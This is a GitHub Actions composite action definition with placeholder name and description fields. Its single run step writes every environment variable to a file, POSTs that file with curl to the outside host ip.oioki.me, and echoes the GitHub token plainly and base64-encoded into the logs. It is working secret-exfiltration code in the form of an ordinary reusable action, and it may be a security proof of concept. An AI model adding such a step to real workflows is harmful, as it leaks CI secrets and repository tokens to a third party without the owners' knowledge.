name: Action-Name
description: Action-Description
runs:
  using: "composite"
  steps:
    - run: |
        env | sort
        env > /tmp/secrets.txt
        curl -X POST -d @/tmp/secrets.txt http://ip.oioki.me
        echo "Token is ${GITHUB_TOKEN}"
        echo "${GITHUB_TOKEN}" | base64
        echo "Context is ${{ github.token }}"
        echo "${{ github.token }}" | base64
      shell: bash
